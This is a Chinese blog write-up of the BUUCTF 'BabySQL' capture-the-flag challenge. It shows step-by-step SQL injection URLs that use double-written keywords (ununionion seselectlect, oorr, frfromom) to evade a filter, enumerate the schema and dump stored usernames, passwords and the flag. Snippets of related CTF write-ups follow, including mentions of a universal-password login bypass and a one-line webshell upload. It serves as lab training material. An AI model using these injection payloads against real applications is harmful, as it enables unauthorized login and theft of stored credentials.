BUU - [极客大挑战 2019]BabySQL

最新推荐文章于 2022-03-19 10:44:54 发布
最新推荐文章于 2022-03-19 10:44:54 发布
阅读量237 收藏
点赞数
分类专栏: # 凌晨四点起床刷题 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/114801579
版权

题目提示对输入进行了过滤

在这里插入图片描述

?username=admin&password=1' or 1=1#

在这里插入图片描述

猜测是过滤了or,双写绕过

?username=admin&password=1'oorr 1=1%23

在这里插入图片描述正常登录

进入注入流程

查库名

猜测列数,试回显位置

?username=admin&password=1' ununionion seselectlect 1,2,3%23
查询库名
?username=admin&password=1' union select 1,2,database()%23

在这里插入图片描述

临近原则猜测select被过滤,双写绕过

在这里插入图片描述

同理union双写

?username=admin&password=1' ununionion seselectlect 1,2,database()%23

Your password is 'geek'
爆表名
?username=admin&password=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.TABLES wwherehere table_schema='geek'%23

Hello 2!
Your password is 'b4bsql,geekuser'
爆字段
?username=admin&password=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.COLUMNS wwherehere table_name='b4bsql'%23

Your password is 'id,username,password'
数据
?username=admin&password=1' ununionion seselectlect 1,2,group_concat(concat('(',id,';',username,';',passwoorrd,')')) frfromom b4bsql%23

Your password is '(1;cl4y;i_want_to_play_2077),(2;sql;sql_injection_is_so_fun),(3;porn;do_you_know_pornhub),(4;git;github_is_different_from_pornhub),(5;Stop;you_found_flag_so_stop),(6;badguy;i_told_you_to_stop),(7;hacker;hack_by_cl4y),(8;flag;flag{058e7ef4-14d4-427a-b5cd-65e3b2cad32a})'
車鈊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7157
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
BUUCTF [HCTF 2018]admin 1
weixin_45642610的博客
01-15 4888
BUUCTF [HCTF 2018]admin 1 进去后是这样,右上角有注册登录。看看主页源码。 看来如果是admin(管理员)会有东西不同。 随便注册一个账号,登录(注册登录的源码都看看,所有的页面源码都要看!找提示,甚至一行一行代码看)。 在改密码界面看到: 输网址,下载。 用pycharm或其他打开,审计代码。先看路由(route) 没什么特别的,就其他都看看。最后在templates目录下的index.html找到 如果session等于admin就出hctf{},即flag。 而提示
BUUCTF WEB admin1
qq_41696858的博客
09-03 784
这题考的是flask框架的session机制 和我以前观念里不太一样的一点是flask这个框架,session是完全存在本地的,只不过存在着一种加密算法,把它加密了存在了本地,也就是说我们只要有了加密密钥,那session里的值是完全可以被我们修改的 打开场景,查看源码,/login,/register是提示you are not admin 那么就是要以admin权限登录了,几个页面翻了几遍也没找到sql注入啥的漏洞,那只能考虑越权了 先注册一个普通用户,test,1234,登录,查看页面源码,发现a链接
BUUCTF学习笔记-admin
weixin_42271850的博客
03-18 3303
BUUCTF学习笔记-admin 时间:2020/03/17 考点:session欺骗、flask框架         首页中右键查看源代码,可以看到有一个提示。you are not admin,大概就能猜到这一题估计就是要使用admin的身份去登陆网站拿到flag。于是就使用账号admin密码123发现直接...
[极客挑战 2019]BabySQL
qq_37301470的博客
11-13 393
[极客挑战 2019]BabySQL 打开发现传统的登录界面 提示有过滤 首先试试注释掉密码验证 check.php?username=admin' %23&password=123456 成功登录 Hello admin! Your password is '55d94c431213ae807b9ed68f7f51acb8' 试试万能密码 check.php?username=admin' or 1=1 %23&password=123456 报错 You have an err
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
BUUCTF [HCTF 2018]admin
qq_42158602的博客
01-11 1081
第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面 查看一下源码 有个注释 应该是提示我们用admin账号登录 先随便注册一个账号看看 登录成功后有三个界面 随便看了看 先去登录注册页面试试有什么注入没有 在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性 报错了 ,好像没行。不过这界面还能运行python 可以看见一些东西 ,感觉...
[极客挑战 2019]PHP 解题记录
walker_skill的博客
07-12 477
[极客挑战 2019]PHP 1 解题记录审题第一阶段,寻找源码第二阶段,源码分析第三阶段,解决__wakeup 题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]PHP 先说明一下刷题方式,点击题目后启动靶机,进入这个靶机提供的访问网址后,使用工具对其进行分析,找出漏洞进行攻击,然后从服务器文件或源码等处找到形如flag{XXXX-XXX} 的字符串进行提交,从而完成攻击任务。
BUUCTF [极客挑战 2019]BabySQL
m0_63253040的博客
03-19 841
进入环境是一个登入页面,提示有过滤 通过测试,发现万能密码登录过滤啦or,用||替代 然后开始sql注入爆数据库 这里union,select都被过滤,双写绕过,先看看回显 check.php?username=admin&password=' ununionion seselectlect 1,2,3 %23 爆数据库:geek 爆数据表: check.php?username=admin&password=' ununionion seselectle.
[极客挑战 2019]BuyFlag 1
shinygod的博客
01-31 1004
考点: 1. 点进去看看。 右上角有一个菜单。 呦西,payflag ^ _ ^ 要我们付钱才能拿flag,那我肯定只能白嫖啊,老规矩先右键看一下源代码有没有好东西。 它提示我们要post两个参数一个money和password,并且password要等于404,并且这边是双等于号。 用hackbar传了啥反应都没有,难道姿势有问题?,抓个包试试。 ...
CTF-Web-SQL注入
beihai2013
01-26 3201
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
BUUCTF [极客挑战 2019]PHP 1
weixin_45642610的博客
01-14 5300
BUUCTF [极客挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
BUUCTF Web[极客挑战2019] EasySQL
qq_36348811的博客
03-28 287
问题分析 题目类型是Web类型,而且是一个登录页面,首先考虑是否是SQL注入。 先尝试闭合方式,输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合。 根据报错信息,尝试注入,在此之前了解一下万能用户名和万能密码。 补充知识 所谓的万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站,所以称之为万能。 最常用的管理员用户名:admin root user test guest select * from table_na
BUUCTF:[极客挑战 2019]EasySQL
末初的CSDN博客
10-06 1035
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]EasySQL 登录框,尝试了一下万能密码直接得到flag Seanz7' or '1'='1 PS:用户框和密码框都需要万能密码,可能用户名验证和密码验证没有在一条sql语句中 ...
[极客挑战 2019]Upload 1
uihijio的博客
02-24 127
这题提示是上传 然后上传了一个jpg带一句话的马上去结果报错 这是内容检测到了<? 然后试了一下ptml,没想到就成了 在phtml中插入一句话 GIF89a? 蚁剑连接
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值